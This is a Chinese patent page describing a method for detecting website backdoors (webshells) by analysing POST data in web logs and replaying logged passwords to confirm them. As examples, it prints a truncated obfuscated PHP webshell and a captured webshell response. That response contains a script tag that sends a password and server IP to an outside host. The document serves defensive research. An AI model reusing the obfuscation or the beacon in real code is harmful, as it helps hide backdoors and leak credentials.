CN108322420B - 后门文件的检测方法和装置 - Google Patents
后门文件的检测方法和装置 Download PDFInfo
- Publication number
- CN108322420B CN108322420B CN201710032022.XA CN201710032022A CN108322420B CN 108322420 B CN108322420 B CN 108322420B CN 201710032022 A CN201710032022 A CN 201710032022A CN 108322420 B CN108322420 B CN 108322420B
- Authority
- CN
- China
- Prior art keywords
- file
- backdoor
- back door
- suspected
- password
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/145—Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Virology (AREA)
- Storage Device Security (AREA)
- Information Transfer Between Computers (AREA)
Abstract
本申请提供一种后门文件的检测方法和装置,该方法可以包括:获取针对文件的访问记录的网站日志;提取所述网站日志中的提交数据;基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件。通过本申请的技术方案,能够准确的识别出后门文件,保证网站的安全性。
Description
技术领域
本申请涉及网络安全技术领域,尤其涉及一种后门文件的检测方法和装置。
背景技术
Web shell(网站后门)文件也称之为网页后门文件,通常由与网站语言相同的编程语言编写而成,黑客在入侵网站后,一般将后门文件放在某个隐蔽的目录下,以达到控制网站的目的。
现有技术中,黑客为了避免上传到网站的后门文件被其他黑客发现和使用,会在后门文件中写入身份验证程序,那么访问该后门文件的黑客必须输入正确的密码,该后门文件才会执行真正的后门代码。目前出现的较多的全功能型网页木马,即拥有包括目录浏览、命令执行、系统提权等黑客常用功能的木马,其验证身份时使用的Http(Hyper TextTransfer Protocol,超文本传输协议)报文结构大多非常相似,因此,通过提取Http报文结构中的共同特征,能够得到用于识别可疑木马的身份验证请求的木马特征,因而可以通过分析文件的代码中是否存在木马特征来判断文件是否为后门文件,但是这种方式并不能识别经过混淆及加密过的后门文件,此外,这种方式下总结的有些木马特征在正常文件中也可能出现,因而可能将某些正常文件错误的判断为后门文件。
发明内容
本申请提供后门文件的检测方法和装置,以解决现有技术中识别后门文件例如后门文件不够准确,容易发生误判断等问题。
根据本申请实施例的第一方面,提供一种后门文件的检测方法,应用在服务器上,包括:
获取针对文件的访问记录的网站日志;
提取所述网站日志中的提交数据;
基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件。
根据本申请实施例的第二方面,提供了一种后门文件的检测装置,应用在服务器上,包括:
日志分析模块,用于获取针对文件的访问记录的网站日志,解析所述网站日志,得到所述网站日志中的提交数据,判断所述提交数据是否与后门特征匹配,在所述提交数据与所述后门特征相匹配时,确定所述文件为疑似后门文件;
后门文件验证模块,用于在所述文件为疑似后门文件时,基于后门密码参数查找预存储的后门特征数据库,确定所述疑似后门文件对应的后门访问界面,基于所述提交数据中的密码信息向所述后门访问界面发送访问请求;在访问成功时,确定所述疑似后门文件为后门文件。
根据本申请实施例的第三方面,提供一种后门文件的检测装置,应用在服务器上,包括:
获取单元,用于获取针对文件的访问记录的网站日志;
提取单元,用于提取所述网站日志中的提交数据;
确定单元,用于基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件。
根据本申请实施例的第四方面,提供一种后门文件的检测装置,所述设备为服务器,包括:处理器;用于存储所述处理器可执行指令的存储器;其中,所述处理器被配置为:
获取针对文件的访问记录的网站日志;
提取所述网站日志中的提交数据;
基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件。
根据本申请实施例的第五方面,提供一种计算机存储介质,所述存储介质中存储有程序指令,所述指令包括:
获取针对文件的访问记录的网站日志;
提取所述网站日志中的提交数据;
基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件。
由以上技术方案可见,本申请的实施例中服务器无需像现有技术中那样对文件的代码进行特征匹配,而是通过提取网站日志的提交数据,根据提交数据中的密码参数确定网站日志所针对的文件可能属于的木马类型及木马访问界面,并且进一步基于该提交数据中的密码信息访问木马访问界面,来确定该文件是否为真正的后门文件。通过这种方式,可以精确的识别出后门文件,检测准确度高,且不会发生漏检和误检,有效保护网站的安全。
附图说明
图1是本申请后门文件的检测方法的场景示意图;
图2是本申请后门文件的检测方法的一个实施例流程图;
图3是本申请服务器的一个模块示意图;
图4为本申请后门文件的检测装置所在设备的一种硬件结构图;
图5为本申请后门文件的检测装置的一个实施例框图。
具体实施方式
在本申请使用的术语是仅仅出于描述特定实施例的目的,而非旨在限制本申请。在本申请和所附权利要求书中所使用的单数形式的“一种”、“所述”和“该”也旨在包括多数形式,除非上下文清楚地表示其他含义。还应当理解,本文中使用的术语“和/或”是指并包含一个或多个相关联的列出项目的任何或所有可能组合。
应当理解,尽管在本申请可能采用术语第一、第二、第三等来描述各种信息,但这些信息不应限于这些术语。这些术语仅用来将同一类型的信息彼此区分开。例如,在不脱离本申请范围的情况下,第一信息也可以被称为第二信息,类似地,第二信息也可以被称为第一信息。取决于语境,如在此所使用的词语“如果”可以被解释成为“在……时”或“当……时”或“响应于确定”。
现有技术中,黑客在入侵网站之后,通常都会选择一个隐秘目录放置后门文件,例如不常访问的目录、用于放置临时文件的目录等,以避免该后门文件被网站管理员或其他黑客发现,或者被服务器的木马查杀工具检测到。由于全功能型网页木马本身自带丰富的功能,而这些功能中有很多敏感函数带有木马特征,因而网页木马查杀工具很轻易地就能够发现这些网页木马的后门文件。为了避免被查杀工具查出,利用目前大多数网站编程语言都支持动态代码的生成和运行的特性,黑客对全功能型网页木马进行加密和混淆。
例如,某个全功能型网页木马的后门代码如下:
<?php
$info='7P3ZcuPMsiUIv0pb2b/N6r9pwyDqfLK2ukgkAVJQAhSGCBC4IwFaQsQgpkSJFNvq3duXB0CC1JCZ+5xqq4u2GnbqI.......
?>
上面的代码由于经过base64编码和gzcompress压缩,因而表面上看没有任何木马特征,因而常规的后门检测或查杀工具不能够识别出其为全功能型网页木马的后门文件。
本申请的实施例提出一种新的后门文件的检测方法及装置,通过分析网站日志中的提交数据,根据提交数据中的密码参数确定文件是否为疑似后门文件,并进一步确定疑似后门文件的木马类型和木马访问界面,最后通过提交数据中的密码信息来访问疑似后门文件的木马访问页面来确定该文件是否为真正的后门文件。这种方式能够识别出网站中存在的后门文件,准确率高。本申请的实施例可以应用于服务器中,服务器可以是一个物理或逻辑服务器,也可以是由两个或两个以上分担不同职责的物理或逻辑服务器、相互协同来实现本申请实施例中服务器的各项功能。本申请实施例对服务器的种类,以及服务器之间通信网络的类型、协议等均不做限定。
参见图1,为本申请实施例的后门文件的检测方法的场景示意图:
图1场景包括:第一服务器,例如Web服务器,还可以包括第二服务器,用于向第一服务器发送访问请求,从而使得第一服务器生成网站日志,图1中仅示出了一个第二服务器,实际上第二服务器的数量不限于此。
应用在服务器上的后门文件的检测方法的流程如图2所示。
步骤201、获取针对文件的访问记录的网站日志。
在Web服务器中,每当用户访问某个网站文件,都会生成一条对应的网站日志,本申请步骤中,服务器获取最新生成的网站日志。
步骤202、提取网站日志中的提交数据。
本申请实施例中,服务器解析网站日志,得到对应的提交数据post-date。
本申请实施例中,在以post或get方式提交的网站日志中包含有提交数据,提交数据指的是包含有用户信息,例如:用户名、密码等信息的数据。例如当用户通过密码登录网站的界面时、用户上传文件时、用户修改个人信息时等,服务器都会生成包含有用户名和密码的表单,表单的格式可以包括例如:name=1,and,pass=2,表示用户名参数为name,用户名信息为1,密码参数为pass,密码信息为2,然后服务器将表单中的内容转换成提交数据,将提交数据与网站日志对应的进行存储。从而服务器基于网站日志能够获取提交数据。
步骤203、基于提交数据检测该文件是否为疑似后门文件,在该文件为疑似后门文件时,基于该提交数据确定疑似后门文件是否为后门文件。
首先,服务器对网站日志进行初步判断,确定网站日志对应的文件是否为疑似后门文件,服务器解析所提取的提交数据,得到用户访问对应的文件时所使用的密码信息,及用于表示密码信息的密码参数。
然后,服务器将密码参数与预设的后门密码参数进行比对。
本实施例中,后门以木马为例进行说明。通常,当黑客通过木马登录网站之后,生成的表单中的特征与正常表单会有所不同。例如,用户名为空,密码参数可能表示为pass1、pass2,而非正常情况下的pass,等。
通过收集大量木马的特征,能够得出不同木马类型对应的不同木马密码参数。因而通过将提交数据中的密码参数与木马密码参数进行比对,能够确定网站日志对应的文件是否为疑似后门文件,即疑似后门文件。
对于全功能型网页木马,黑客在身份验证界面上提交的数据包存在共性,这是由于木马登录页面只需输入一个密码即可完成身份验证,而不像其他正常登录页面一样需要多种参数进行校验。因此,黑客向后门文件发送的数据包中只有一两个参数。另外,全功能型网页木马的登录请求数据包中的参数基本一致,因此通过收集大量的全功能型网页木马的登录请求数据包,就能够得到能覆盖大部分网页木马的木马特征,并且可以从提交数据中提取出用于登录的木马密码参数。
在比对结果为密码参数与预设的木马密码参数一致时,确定网站日志针对的文件为疑似后门文件。
然后,在判断为提交数据中的密码参数符合木马密码参数的特征时,确定对应的木马类型。
在服务器中,预存储有各种木马类型的木马密码参数,及对应的木马访问界面。当提交数据中的密码参数与某个木马密码参数一致时,服务器可以确定该文件为疑似后门文件,并且,与该木马密码参数一致的木马类型即该疑似后门文件的木马类型,对应的木马访问界面即疑似后门文件的木马访问界面。
然后,在确定了木马访问界面时,木马类型对应的访问界面URL(UniformResource Locator,统一资源定位器)也随之确定。
本申请实施例中,确定了木马访问界面之后,可以基于提交数据中的密码信息向访问界面URL发送访问请求,进行身份验证。
现有技术中,全功能型网页木马的身份验证流程如下:首先,黑客访问网页木马访问界面URL,然后,木马返回一个用于请求输入密码的界面,即木马访问界面,然后,黑客在木马访问界面上输入密码并提交,最后,木马对密码进行验证,如果密码验证正确,进入木马的真实页面;如果密码错误则显示出错提示。
本申请实施例中,基于上述访问流程,使用提交数据中的密码信息去访问木马访问界面,以进一步的验证该疑似后门文件是否为真正的后门文件。
然后,服务器接收木马访问界面返回的访问响应。如果该密码信息为错误,那么访问响应会指示密码错误,意味着访问失败,该网站日志针对的文件不是后门文件。如果密码信息正确,那么会进入真正的木马页面,这就意味着访问成功,网站日志针对的文件是后门文件。
针对后门文件,服务器可以进行隔离、清除或删除处理,这种情况下服务器获取网站日志针对的文件的URL,并基于该URL查找到对应的后门文件;然后将该后门文件删除、清除或进行隔离,以避免网站受到攻击。
本申请实施例中,如果提交数据中的密码参数与预存储的某个木马密码参数一致,并不能确认该文件一定是一个后门文件。这是因为一方面密码参数验证只是一种模糊匹配,可能会命中一些网站正常的请求;另一方面网络上有很多黑客会主动去扫描网站的后门文件,这些扫描请求带有固定的URL地址,同时在这些请求中会携带一个密码尝试进行验证,如果返回内容满足某些特征,则认为后门文件是存在的。因而,本申请实施例中,将与预设置的木马密码参数一致的文件称之为疑似后门文件,并通过使用密码信息去访问木马访问界面来进一步确认该文件是否为真正的后门文件。如果访问成功则说明身份验证成功,那么可以精确确认后门文件。
从上述实施例可以看出,本申请通过对针对文件的访问记录的网站日志进行分析,得到提交数据,基于提交数据中的密码参数对网站日志对应的文件进行初步判断,识别出疑似后门文件,并通过密码信息访问木马访问界面,以对疑似后门文件进行进一步的验证,能够高准确度的识别出网站中的所有后门文件。
参见图3,为本申请实施例的服务器的模块示意图,图3中包括:日志分析模块310和后门文件验证模块320。
其中,日志分析模块310,用于获取针对文件的访问记录的网站日志,解析网站日志,得到网站日志中的提交数据,判断提交数据是否与后门特征匹配,在提交数据与所述后门特征相匹配时,确定文件为疑似后门文件。
现有技术中,由于后门文件例如木马文件不像其他登录页面一样需要多种参数进行身份校验,只需一个密码即可完成校验,因而黑客向木马文件提交密码信息的数据包是存在共性的,这类数据包中的参数只有一到两个。另外,对于全功能型网页木马,登录请求数据包中的参数基本一致,因此只需要几个特征即能覆盖大部分的木马。这些特征通过收集各种网页木马并进行研究之后就能够得到,并存储到木马特征数据库中,可以将木马类型与木马访问界面以及木马特征对应的进行存储。
全功能型网页木马的身份校验一般通过POST请求完成。因此,日志分析模块的主要工作,就是分析每一条网站日志中post_data内容,通过与木马特征数据库中的内容进行比对,来判断是否满足全功能型网页木马的特征。如果满足特征,则确认该文件为疑似后门文件,把该条网站日志的URL、post_data等信息进行存储,以供后门文件验证模块320进一步验证疑似后门文件是否为真正的后门文件。
后门文件验证模块320,用于在文件为疑似后门文件时,基于后门密码参数查找预存储的后门特征数据库,确定所述疑似后门文件对应的后门访问界面,基于提交数据中的密码信息向所述后门访问界面发送访问请求;在访问成功时,确定该疑似后门文件为后门文件。
日志分析模块310通过提交数据中的信息能够确认文件为疑似后门文件,并不意味着这个疑似后门文件就是一个真正的后门文件。一方面身份验证特征只是一种模糊匹配,可能会命中一些网站正常的请求;另外网络上有很多黑客会主动去扫描网站后门文件,这些扫描请求有固定的URL地址,同时在请求中会携带一个密码尝试进行验证,如果返回内容满足某些特征,则认为后门是存在的。由于上述原因,本申请实施例需要一个后门文件验证模块320来确认日志分析模块310确认的疑似后门文件是否为真正的木马文件。
在一实施例中,用户通过密码登录网站的界面时,例如该网站的网址为:http://www.four-faith.com/api/video_api/pdo.inc.php,向服务器端提交的数据包内容如下,并生成对应的网站日志:
POST/api/video_api/pdo.inc.php HTTP/1.1
Host:www.four-faith.com
Content-Length:14
Cache-Control:max-age=0
Origin:http://www.four-faith.com
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(Macintosh;Intel Mac OS X 10_10_5)AppleWebKit/537.36(KHTML,like Gecko)Chrome/54.0.2840.98Safari/537.36
Content-Type:application/x-www-form-urlencoded
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer:http://www.four-faith.com/api/video_api/pdo.inc.php
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.8
Connection:close
pass=ryfgddjs1
通过获取网站日志,得到的提交数据为post_data:“pass=ryfgddjs1”。通过数据包的第一行,表明了该数据包是一个POST请求。post_data部分,只有一个pass参数,即密码参数,参数的内容ryfgddjs1是用户填入的密码信息。
大多数的木马都符合上述两个特征,第一特征就是属于POST请求;第二特征是post_data部分只有一个或两个参数,且参数名字相对固定,例如pass、password等,这些特征都已预存储在木马特征数据库中,从而通过将pass参数与木马特征数据库中存储的内容对比,可以判定该网络日志对应的文件为疑似后门文件。
在另一个实施例中,服务器根据接收到的数据包生成网站日志,数据包的内容如下:
POST/e/action/InfoType/admin.php HTTP/1.1
Host:www.bwpx.com
Content-Length:26
Cache-Control:max-age=0
Origin:http://www.bwpx.com
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(Macintosh;Intel Mac OS X 10_10_5)AppleWebKit/537.36(KHTML,like Gecko)Chrome/54.0.2840.98Safari/537.36
Content-Type:application/x-www-form-urlencoded
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer:http://www.bwpx.com/e/action/InfoType/admin.php
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.8
Connection:close
password=admin&doing=login
根据上述数据包,可以确定密码参数为“password”,密码信息为“admin”,通过将密码参数与预存储的木马特征数据库中的特征进行比对,能够确定该网站日志对应的文件为疑似后门文件。然后获取对应的木马访问界面,并使用密码信息“admin”发送登录请求,接收到的返回响应如下:
HTTP/1.1 200OK
Content-Type:text/html
Server:Microsoft-IIS/7.0
X-Powered-By:PHP/5.2.17
Set-Cookie:phpspypass=admin;expires=Thu,01-Dec-2016 10:56:06GMT;path=/
X-Powered-By:ASP.NET
Date:Wed,30Nov 2016 10:56:05GMT
Connection:close
Content-Length:248
<meta
http-equiv="refresh"content="1;URL=/e/action/InfoType/admin.php">
<a style="font:12px Verdana"
href="/e/action/InfoType/admin.php">Success</a>
<script
src=http://www.guogoucaidao.cn/lonely000123/api.php?pass=admin&ip=115.28.135.171></script>
根据对后门文件源代码的分析,可以确定只要服务器返回的数据包满足:content="1;URL=/e/action/InfoType/admin.php",就能确定疑似后门文件为后门文件,从而精确的验证了是否为后门文件。
与本申请后门文件的检测方法的实施例相对应,本申请还提供了后门文件的检测装置的实施例。
本申请后门文件的检测装置的实施例可以应用在服务器上。装置实施例可以通过软件实现,也可以通过硬件或者软硬件结合的方式实现。以软件实现为例,作为一个逻辑意义上的装置,是通过其所在设备的处理器将非易失性存储器中对应的计算机程序指令读取到内存中运行形成的。从硬件层面而言,如图4所示,为本申请后门文件的检测装置所在设备的一种硬件结构图,除了图4所示的处理器410、内存420、网络接口430、以及非易失性存储器440之外,实施例中后门文件的检测装置450所在的设备通常根据该设备的实际功能,还可以包括其他硬件,图4中不再一一示出。
参见图5,为本申请后门文件的检测装置的一个实施例框图,该装置可以应用在服务器上,该装置包括:第一获取单元510、提取单元520和确定单元530。
其中,第一获取单元510,用于获取针对文件的访问记录的网站日志;
提取单元520,用于提取所述网站日志中的提交数据;
确定单元530,用于基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件。
在一个可选的实现方式中,确定单元530可以包括(图5中未示出):
解析子单元,用于解析所述提交数据,得到用户访问所述文件时所使用的用于表示密码信息的密码参数;
比对子单元,用于将所述密码参数与预设的对应于各后门类型的后门密码参数进行比对;
第一确定子单元,用于在比对结果为所述密码参数与预设的后门密码参数一致时,确定所述网站日志针对的文件为疑似后门文件。
在另一个可选的实现方式中,确定单元530可以包括(图5中未示出):
第二确定子单元,用于基于所述提交数据访问所述疑似后门文件对应的后门访问界面,在访问成功时,确定所述疑似后门文件为后门文件。
在另一个可选的实现方式中,第二确定子单元包括(图5中未示出):
第一确定模块,用于基于与所述密码参数一致的后门密码参数查找预存储的后门特征数据库,确定所述疑似后门文件的后门类型;
第二确定模块,用于基于所述后门类型查找所述后门特征数据库,确定对应的后门访问界面;
发送模块,用于基于用户访问所述文件时所使用的所述密码信息向所述后门访问界面发送访问请求;
第一接收模块,用于在接收到所述后门访问界面返回的访问响应为密码正确时,确认访问成功。
在另一个可选的实现方式中,第二确定子单元可以包括(图5中未示出):
第二接收模块,用于接收所述后门访问界面返回的访问响应;
第三确认模块,用于在所述访问响应指示密码错误时,访问失败,确定所述网站日志针对的文件不是后门文件。
在另一个可选的实现方式中,装置还可以包括(图5中未示出):
显示单元,用于显示后门页面。
在另一个可选的实现方式中,装置还可以包括(图5中未示出):
第二获取单元,用于获取所述网站日志针对的文件的统一资源定位符URL;
查找单元,用于基于所述URL查找所述后门文件;
处理单元,用于处理所述后门文件。
在另一个可选的实现方式中,处理单元还可以包括(图5中未示出):
处理子单元,用于删除、隔离或清除所述后门文件。
上述装置中各个单元的功能和作用的实现过程具体详见上述方法中对应步骤的实现过程,在此不再赘述。
对于装置实施例而言,由于其基本对应于方法实施例,所以相关之处参见方法实施例的部分说明即可。以上所描述的装置实施例仅仅是示意性的,其中所述作为分离部件说明的单元可以是或者也可以不是物理上分开的,作为单元显示的部件可以是或者也可以不是物理单元,即可以位于一个地方,或者也可以分布到多个网络单元上。可以根据实际的需要选择其中的部分或者全部模块来实现本申请方案的目的。本领域普通技术人员在不付出创造性劳动的情况下,即可以理解并实施。
由上述实施例可见,服务器无需像现有技术中那样对文件的代码进行特征匹配,而是通过提取网站日志的提交数据,根据提交数据中的密码信息确定网站日志所针对的文件可能属于的木马类型及木马访问界面,并且进一步基于该提交数据访问木马访问界面,来确定该文件是否为后门文件。通过这种方式,可以精确的识别出后门文件,检测准确度高,且不会发生漏检和误检,有效保护网站的安全。
本领域技术人员在考虑说明书及实践这里公开的发明后,将容易想到本申请的其它实施方案。本申请旨在涵盖本申请的任何变型、用途或者适应性变化,这些变型、用途或者适应性变化遵循本申请的一般性原理并包括本申请未公开的本技术领域中的公知常识或惯用技术手段。说明书和实施例仅被视为示例性的,本申请的真正范围和精神由下面的权利要求指出。
应当理解的是,本申请并不局限于上面已经描述并在附图中示出的精确结构,并且可以在不脱离其范围进行各种修改和改变。本申请的范围仅由所附的权利要求来限制。
Claims (17)
1.一种后门文件的检测方法,应用在服务器上,其特征在于,包括:
获取针对文件的访问记录的网站日志;
提取所述网站日志中的提交数据;
基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件;
所述基于所述提交数据检测所述文件是否为疑似后门文件,包括:
解析所述提交数据,得到用户访问所述文件时所使用的用于表示密码信息的密码参数;
将所述密码参数与预设的对应于各后门类型的后门密码参数进行比对;
在比对结果为所述密码参数与预设的后门密码参数一致时,确定所述网站日志针对的文件为疑似后门文件。
2.根据权利要求1所述的方法,其特征在于,所述基于所述提交数据确定所述疑似后门文件是否为后门文件,包括:
基于所述提交数据访问所述疑似后门文件对应的后门访问界面,在访问成功时,确定所述疑似后门文件为后门文件。
3.根据权利要求2所述的方法,其特征在于,所述基于所述提交数据访问所述疑似后门文件对应的后门访问界面,包括:
基于与所述密码参数一致的后门密码参数查找预存储的后门特征数据库,确定所述疑似后门文件的后门类型;
基于所述后门类型查找所述后门特征数据库,确定对应的后门访问界面;
基于用户访问所述文件时所使用的所述密码信息向所述后门访问界面发送访问请求;
在接收到所述后门访问界面返回的访问响应为密码正确时,确认访问成功。
4.根据权利要求3所述的方法,其特征在于,所述基于所述密码信息向所述后门访问界面发送访问请求之后,所述方法还包括:
接收所述后门访问界面返回的访问响应;
在所述访问响应指示密码错误时,访问失败,确定所述网站日志针对的文件不是后门文件。
5.根据权利要求3所述的方法,其特征在于,所述确认访问成功之后,所述方法还包括:
显示后门页面。
6.根据权利要求1所述的方法,其特征在于,所述确定所述网站日志针对的文件为后门文件之后,所述方法还包括:
获取所述网站日志针对的文件的统一资源定位符URL;
基于所述URL查找所述后门文件;
处理所述后门文件。
7.根据权利要求6所述的方法,其特征在于,所述处理所述后门文件,包括:
删除、隔离或清除所述后门文件。
8.一种后门文件的检测装置,其特征在于,包括:
日志分析模块,用于获取针对文件的访问记录的网站日志,解析所述网站日志,得到所述网站日志中的提交数据,判断所述提交数据是否与后门特征匹配,在所述提交数据与所述后门特征相匹配时,确定所述文件为疑似后门文件;
后门文件验证模块,用于在所述文件为疑似后门文件时,基于后门密码参数查找预存储的后门特征数据库,确定所述疑似后门文件对应的后门访问界面,基于所述提交数据中的密码信息向所述后门访问界面发送访问请求;在访问成功时,确定所述疑似后门文件为后门文件。
9.一种后门文件的检测装置,应用在服务器上,其特征在于,包括:
第一获取单元,用于获取针对文件的访问记录的网站日志;
提取单元,用于提取所述网站日志中的提交数据;
确定单元,用于基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件;
所述确定单元包括:
解析子单元,用于解析所述提交数据,得到用户访问所述文件时所使用的用于表示密码信息的密码参数;
比对子单元,用于将所述密码参数与预设的对应于各后门类型的后门密码参数进行比对;
第一确定子单元,用于在比对结果为所述密码参数与预设的后门密码参数一致时,确定所述网站日志针对的文件为疑似后门文件。
10.根据权利要求9所述的装置,其特征在于,所述确定单元包括:
第二确定子单元,用于基于所述提交数据访问所述疑似后门文件对应的后门访问界面,在访问成功时,确定所述疑似后门文件为后门文件。
11.根据权利要求10所述的装置,其特征在于,所述第二确定子单元包括:
第一确定模块,用于基于与所述密码参数一致的后门密码参数查找预存储的后门特征数据库,确定所述疑似后门文件的后门类型;
第二确定模块,用于基于所述后门类型查找所述后门特征数据库,确定对应的后门访问界面;
发送模块,用于基于用户访问所述文件时所使用的所述密码信息向所述后门访问界面发送访问请求;
第一接收模块,用于在接收到所述后门访问界面返回的访问响应为密码正确时,确认访问成功。
12.根据权利要求11所述的装置,其特征在于,所述第二确定子单元还包括:
第二接收模块,用于接收所述后门访问界面返回的访问响应;
第三确认模块,用于在所述访问响应指示密码错误时,访问失败,确定所述网站日志针对的文件不是后门文件。
13.根据权利要求11所述的装置,其特征在于,所述装置还包括:
显示单元,用于显示后门页面。
14.根据权利要求9所述的装置,其特征在于,所述装置还包括:
第二获取单元,用于获取所述网站日志针对的文件的统一资源定位符URL;
查找单元,用于基于所述URL查找所述后门文件;
处理单元,用于处理所述后门文件。
15.根据权利要求14所述的装置,其特征在于,所述处理单元包括:
处理子单元,用于删除、隔离或清除所述后门文件。
16.一种后门文件的检测设备,其特征在于,所述设备为服务器,包括:处理器;用于存储所述处理器可执行指令的存储器;其中,所述处理器被配置为:
获取针对文件的访问记录的网站日志;
提取所述网站日志中的提交数据;
基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件;
所述基于所述提交数据检测所述文件是否为疑似后门文件,包括:
解析所述提交数据,得到用户访问所述文件时所使用的用于表示密码信息的密码参数;
将所述密码参数与预设的对应于各后门类型的后门密码参数进行比对;
在比对结果为所述密码参数与预设的后门密码参数一致时,确定所述网站日志针对的文件为疑似后门文件。
17.一种计算机存储介质,所述存储介质中存储有程序指令,其特征在于,所述指令被处理器执行时实现以下方法,所述方法包括:
获取针对文件的访问记录的网站日志;
提取所述网站日志中的提交数据;
基于所述提交数据检测所述文件是否为疑似后门文件,在所述文件为疑似后门文件时,基于所述提交数据确定所述疑似后门文件是否为后门文件;
所述基于所述提交数据检测所述文件是否为疑似后门文件,包括:
解析所述提交数据,得到用户访问所述文件时所使用的用于表示密码信息的密码参数;
将所述密码参数与预设的对应于各后门类型的后门密码参数进行比对;
在比对结果为所述密码参数与预设的后门密码参数一致时,确定所述网站日志针对的文件为疑似后门文件。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201710032022.XA CN108322420B (zh) | 2017-01-17 | 2017-01-17 | 后门文件的检测方法和装置 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201710032022.XA CN108322420B (zh) | 2017-01-17 | 2017-01-17 | 后门文件的检测方法和装置 |
Publications (2)
Publication Number | Publication Date |
---|---|
CN108322420A CN108322420A (zh) | 2018-07-24 |
CN108322420B true CN108322420B (zh) | 2020-12-29 |
Family
ID=62891100
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201710032022.XA Active CN108322420B (zh) | 2017-01-17 | 2017-01-17 | 后门文件的检测方法和装置 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN108322420B (zh) |
Families Citing this family (4)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN109194632B (zh) * | 2018-08-20 | 2022-07-15 | 中国平安人寿保险股份有限公司 | 网页后门程序的检测方法、装置、计算机设备和存储介质 |
CN110519270B (zh) * | 2019-08-27 | 2022-01-28 | 杭州安恒信息技术股份有限公司 | 基于文件来源快速检测WebShell的方法及装置 |
CN110868410B (zh) * | 2019-11-11 | 2022-05-10 | 恒安嘉新(北京)科技股份公司 | 获取网页木马连接密码的方法、装置、电子设备、及存储介质 |
CN112182561B (zh) * | 2020-09-24 | 2024-04-30 | 百度在线网络技术(北京)有限公司 | 一种后门的检测方法、装置、电子设备和介质 |
Citations (4)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102647421A (zh) * | 2012-04-09 | 2012-08-22 | 北京百度网讯科技有限公司 | 基于行为特征的web后门检测方法和装置 |
CN104468477A (zh) * | 2013-09-16 | 2015-03-25 | 杭州迪普科技有限公司 | 一种WebShell的检测方法及系统 |
WO2016054626A1 (en) * | 2014-10-03 | 2016-04-07 | Nokomis, Inc. | Detection of malicious software, firmware, ip cores and circuitry via unintended emissions |
CN105933268A (zh) * | 2015-11-27 | 2016-09-07 | 中国银联股份有限公司 | 一种基于全量访问日志分析的网站后门检测方法及装置 |
-
2017
- 2017-01-17 CN CN201710032022.XA patent/CN108322420B/zh active Active
Patent Citations (4)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102647421A (zh) * | 2012-04-09 | 2012-08-22 | 北京百度网讯科技有限公司 | 基于行为特征的web后门检测方法和装置 |
CN104468477A (zh) * | 2013-09-16 | 2015-03-25 | 杭州迪普科技有限公司 | 一种WebShell的检测方法及系统 |
WO2016054626A1 (en) * | 2014-10-03 | 2016-04-07 | Nokomis, Inc. | Detection of malicious software, firmware, ip cores and circuitry via unintended emissions |
